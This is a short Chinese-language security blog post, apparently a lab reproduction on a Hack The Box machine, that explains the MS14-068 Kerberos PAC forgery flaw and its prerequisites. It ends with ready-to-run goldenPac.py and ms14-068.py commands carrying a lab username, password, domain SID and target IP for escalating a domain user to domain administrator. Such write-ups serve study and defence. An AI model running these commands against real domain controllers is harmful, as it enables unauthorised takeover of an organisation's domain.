漏洞危害
提升普通域账号为域管理员账号。
PAC
PAC中包含用户的SID、Group的SID。所以PAC决定了用户的组属性。决定了用户的权限。也就是根据PAC来给予客户端访问何种服务的权限。
PAC存在于TGT中,当用户使用TGT访问KDC的TGS的时候,TGS解密TGT检查PAC的合法性,并重新签名PAC,然后PAC会放在ST中,最后服务主机会根据所携带的PAC来决定客户端访问某些服务的权限。
漏洞关键点
1、KDC在进行签名认证的时候,可以使用客户端指定的任意签名算法。
-
可以任意指定签名算法,所以伪造的内容就是合法的。
2、PAC没有被放在TGT中,但是KDC依旧能够解析PAC。
3、KDC会验证两个PAC,一个是TGT中的PAC,另一个是不在TGT中的PAC,验证成功之后,会提取KDC中的USER SID和组SID。进行重新签名。返回一个TGT给用户,而不是ST。
综上:
攻击者通过截取SID,构造高权限的用户,生成PAC,获取TGT,将普通域用户权限提升为域管理员权限。
漏洞利用前提
1.域控没有打MS14-068的补丁 2.攻击者拿下了一台域内的普通计算机,并获得普通域用户以及密码/hash值,以及用户的suid
漏洞利用
goldenPac
python3 goldenPac.py -dc-ip 10.129.171.157 -target-ip 10.129.171.157 htb.local/james:J@m3s_P@[email protected]
ms14-068
python ms14-068.py -u [email protected] -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d 10.129.172.203 -p J@m3s_P@ssW0rd!
python ms14-068.py -u htb.local/[email protected] -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d 10.129.172.203 -p J@m3s_P@ssW0rd!
原文始发于微信公众号(土拨鼠的安全屋):MS14-068 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论